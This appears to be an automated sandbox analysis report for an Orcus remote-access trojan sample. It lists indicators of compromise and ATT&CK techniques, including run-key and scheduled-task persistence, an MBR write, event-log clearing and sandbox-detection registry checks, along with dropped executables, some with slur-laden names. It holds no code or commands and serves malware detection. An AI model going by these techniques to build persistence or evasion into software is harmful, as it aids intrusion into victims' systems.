orcus | bc3281aba1987ec4b1d4d68e99c8b6829d4fd54477db001bf331971b72789195

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\Control Panel\International\Geo\Nation	jew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\Control Panel\International\Geo\Nation	Orcus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\Control Panel\International\Geo\Nation	OrcusWatchdog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\Control Panel\International\Geo\Nation	BootkitBuilded.exe

Executes dropped EXE 9 IoCs

pid	Process
3136	Install.exe
2836	$77nigga.exe
5040	jew.exe
3164	Orcus.exe
2352	notfud.exe
4276	OrcusWatchdog.exe
4716	Orcus.exe
1304	OrcusWatchdog.exe
4356	Orcus.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Orcus = "\"C:\\Program Files (x86)\\Orcus\\Orcus.exe\""	Orcus.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
556	powershell.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\D:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	wmiprvse.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\notfud	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Orcus\Orcus.exe	jew.exe
File created	C:\Program Files (x86)\Orcus\Orcus.exe.config	jew.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Orcus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Orcus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OrcusWatchdog.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Orcus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OrcusWatchdog.exe

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
1560	cmd.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 19 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	WaaSMedicAgent.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895154779944181"	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1281280933-2069278784-2911492150-1000\{D88744F0-D8ED-403D-9CAB-9B172F35ECDE}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1281280933-2069278784-2911492150-1000\{4BBCD5B5-8E5F-44E0-8025-5E90639C099D}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION	wmiprvse.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4776	schtasks.exe
4684	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2352	notfud.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
556	powershell.exe
556	powershell.exe
556	powershell.exe
624	winlogon.exe
624	winlogon.exe
1304	OrcusWatchdog.exe
1304	OrcusWatchdog.exe
3164	Orcus.exe
3164	Orcus.exe
3164	Orcus.exe
1304	OrcusWatchdog.exe
3164	Orcus.exe
1304	OrcusWatchdog.exe
624	winlogon.exe
624	winlogon.exe
624	winlogon.exe
624	winlogon.exe
1304	OrcusWatchdog.exe
1304	OrcusWatchdog.exe
1304	OrcusWatchdog.exe
3164	Orcus.exe
3164	Orcus.exe
3164	Orcus.exe
624	winlogon.exe
624	winlogon.exe
624	winlogon.exe
624	winlogon.exe
3120	wmiprvse.exe
624	winlogon.exe
624	winlogon.exe
624	winlogon.exe
624	winlogon.exe
1304	OrcusWatchdog.exe
624	winlogon.exe
3164	Orcus.exe
624	winlogon.exe
1304	OrcusWatchdog.exe
3164	Orcus.exe
624	winlogon.exe
624	winlogon.exe
624	winlogon.exe
624	winlogon.exe
624	winlogon.exe
624	winlogon.exe
624	winlogon.exe
1304	OrcusWatchdog.exe
624	winlogon.exe
624	winlogon.exe
1304	OrcusWatchdog.exe
3164	Orcus.exe
3164	Orcus.exe
3120	wmiprvse.exe
3120	wmiprvse.exe
3120	wmiprvse.exe
3120	wmiprvse.exe
624	winlogon.exe
3120	wmiprvse.exe
624	winlogon.exe
3120	wmiprvse.exe
3120	wmiprvse.exe
624	winlogon.exe
624	winlogon.exe
3120	wmiprvse.exe
624	winlogon.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3648	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
3560	msedge.exe
3560	msedge.exe
3560	msedge.exe
3560	msedge.exe
3560	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2836	$77nigga.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	624	winlogon.exe
Token: SeDebugPrivilege	2352	notfud.exe
Token: SeDebugPrivilege	3164	Orcus.exe
Token: SeDebugPrivilege	4276	OrcusWatchdog.exe
Token: SeDebugPrivilege	1304	OrcusWatchdog.exe
Token: SeShutdownPrivilege	3648	Explorer.EXE
Token: SeCreatePagefilePrivilege	3648	Explorer.EXE
Token: SeShutdownPrivilege	3648	Explorer.EXE
Token: SeCreatePagefilePrivilege	3648	Explorer.EXE
Token: SeShutdownPrivilege	3648	Explorer.EXE
Token: SeCreatePagefilePrivilege	3648	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	1708	svchost.exe
Token: SeIncreaseQuotaPrivilege	1708	svchost.exe
Token: SeSecurityPrivilege	1708	svchost.exe
Token: SeTakeOwnershipPrivilege	1708	svchost.exe
Token: SeLoadDriverPrivilege	1708	svchost.exe
Token: SeSystemtimePrivilege	1708	svchost.exe
Token: SeBackupPrivilege	1708	svchost.exe
Token: SeRestorePrivilege	1708	svchost.exe
Token: SeShutdownPrivilege	1708	svchost.exe
Token: SeSystemEnvironmentPrivilege	1708	svchost.exe
Token: SeUndockPrivilege	1708	svchost.exe
Token: SeManageVolumePrivilege	1708	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1708	svchost.exe
Token: SeIncreaseQuotaPrivilege	1708	svchost.exe
Token: SeSecurityPrivilege	1708	svchost.exe
Token: SeTakeOwnershipPrivilege	1708	svchost.exe
Token: SeLoadDriverPrivilege	1708	svchost.exe
Token: SeSystemtimePrivilege	1708	svchost.exe
Token: SeBackupPrivilege	1708	svchost.exe
Token: SeRestorePrivilege	1708	svchost.exe
Token: SeShutdownPrivilege	1708	svchost.exe
Token: SeSystemEnvironmentPrivilege	1708	svchost.exe
Token: SeUndockPrivilege	1708	svchost.exe
Token: SeManageVolumePrivilege	1708	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1708	svchost.exe
Token: SeIncreaseQuotaPrivilege	1708	svchost.exe
Token: SeSecurityPrivilege	1708	svchost.exe
Token: SeTakeOwnershipPrivilege	1708	svchost.exe
Token: SeLoadDriverPrivilege	1708	svchost.exe
Token: SeSystemtimePrivilege	1708	svchost.exe
Token: SeBackupPrivilege	1708	svchost.exe
Token: SeRestorePrivilege	1708	svchost.exe
Token: SeShutdownPrivilege	1708	svchost.exe
Token: SeSystemEnvironmentPrivilege	1708	svchost.exe
Token: SeUndockPrivilege	1708	svchost.exe
Token: SeManageVolumePrivilege	1708	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1708	svchost.exe
Token: SeIncreaseQuotaPrivilege	1708	svchost.exe
Token: SeSecurityPrivilege	1708	svchost.exe
Token: SeTakeOwnershipPrivilege	1708	svchost.exe
Token: SeLoadDriverPrivilege	1708	svchost.exe
Token: SeSystemtimePrivilege	1708	svchost.exe
Token: SeBackupPrivilege	1708	svchost.exe
Token: SeRestorePrivilege	1708	svchost.exe
Token: SeShutdownPrivilege	1708	svchost.exe
Token: SeSystemEnvironmentPrivilege	1708	svchost.exe
Token: SeUndockPrivilege	1708	svchost.exe
Token: SeManageVolumePrivilege	1708	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1708	svchost.exe
Token: SeIncreaseQuotaPrivilege	1708	svchost.exe

Suspicious use of FindShellTrayWindow 58 IoCs

pid	Process
3164	Orcus.exe
3976	Conhost.exe
3560	msedge.exe
3560	msedge.exe
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3560	msedge.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3164	Orcus.exe
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
5932	taskmgr.exe
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE
3648	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs
